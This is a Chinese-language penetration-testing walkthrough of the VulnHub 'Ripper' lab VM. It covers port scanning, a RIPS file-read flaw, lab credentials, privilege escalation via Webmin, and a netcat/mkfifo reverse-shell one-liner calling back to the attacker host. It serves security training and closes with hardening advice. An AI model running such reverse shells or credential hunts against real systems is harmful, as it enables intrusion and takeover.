VnlnHub Ripper
字数 1286 2025-08-10 20:57:54
VulnHub Ripper 靶机渗透测试教学文档
靶场信息
- 靶机名称:Ripper
- 下载地址:https://download.vulnhub.com/ripper/Ripper.ova
- 作者:xiaopanghacker
- 发布日期:2022-10-16
- 难度等级:中级
环境准备
靶机配置
- 下载OVA文件后,使用VirtualBox导入
- 网络模式建议:
- NAT模式(默认)
- 或桥接模式(需与攻击机保持一致)
攻击机配置
- 推荐使用Kali Linux
- 确保与靶机在同一网络段
渗透测试流程
1. 信息收集
网络扫描
nmap -sn 192.168.52.0/24
发现靶机IP为192.168.52.148(假设攻击机为192.168.52.147)
端口扫描
nmap -sV -p- 192.168.52.148
扫描结果:
- 22/tcp - SSH服务
- 80/tcp - HTTP服务 (Apache 2.4.29)
- 10000/tcp - HTTP服务 (MiniServ 1.910 - Webmin)
2. Web服务枚举
80端口服务
- 访问http://192.168.52.148显示Apache默认页面
- 目录爆破未发现有用信息
10000端口服务
- 访问https://192.168.52.148:10000显示Webmin登录页面
- 需要修改hosts文件:
echo "192.168.52.148 bogon" >> /etc/hosts
3. 漏洞发现与利用
Webmin信息收集
- 发现robots.txt包含base64编码:
解码后:V2UgYXJlIHVzaW5nIFJJUFMgdG8gc2NhbiBmb3IgdnVsbmVyYWJpbGl0aWVzIGluIHBocCBjb2RlWe are using RIPS to scan for vulnerabilities in php code
RIPS审计工具发现
- 访问http://192.168.52.148/rips/
- 这是一个PHP源代码审计工具
文件读取漏洞利用
- 使用RIPS扫描/var/www目录(勾选子目录选项)
- 扫描结果中发现文件泄露漏洞,存在file参数
- 利用方式:
http://192.168.52.148/rips/?file=/var/www/html/index.php - 限制:只能读取网站根路径下的文件
敏感信息收集
- 在RIPS中使用搜索功能查找"password"
- 发现一组凭据:
用户名:ripper 密码:RIPper$!
4. 初始访问
SSH登录
ssh ripper@192.168.52.148
密码:RIPper$!
获取第一个flag
cat /home/ripper/flag1.txt
5. 权限提升(ripper → cubes)
查找cubes用户的文件
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
发现敏感文件
- /home/cubes/secret.file内容:
cubes:Cub3s4ever!
切换用户
su cubes
密码:Cub3s4ever!
6. 权限提升(cubes → root)
查找更多线索
过滤无关文件:
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v '.png' | grep -v '/proc' | grep -v '/sys'
发现Webmin日志
- /usr/share/webmin/miniserv.log
- 发现凭据:
root:toor
Webmin登录
- 使用root:toor登录https://bogon:10000
- 左下角有命令执行功能(root权限)
反弹shell
- 攻击机监听:
nc -lvnp 4444 - 在Webmin执行:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f
获取root flag
cat /root/flag2.txt
替代攻击路径
- Webmin已知RCE漏洞(需认证)
- 可使用Metasploit模块:
exploit/linux/http/webmin_backdoor
总结
- 通过信息收集发现Webmin服务
- 利用RIPS审计工具发现文件泄露漏洞
- 获取SSH凭据实现初始访问
- 通过查找敏感文件实现横向移动
- 利用Webmin的认证后命令执行功能获取root权限
安全建议
- 及时更新Webmin到最新版本
- 避免使用默认或弱密码
- 限制敏感文件的访问权限
- 审计工具不应部署在生产环境
- 实施最小权限原则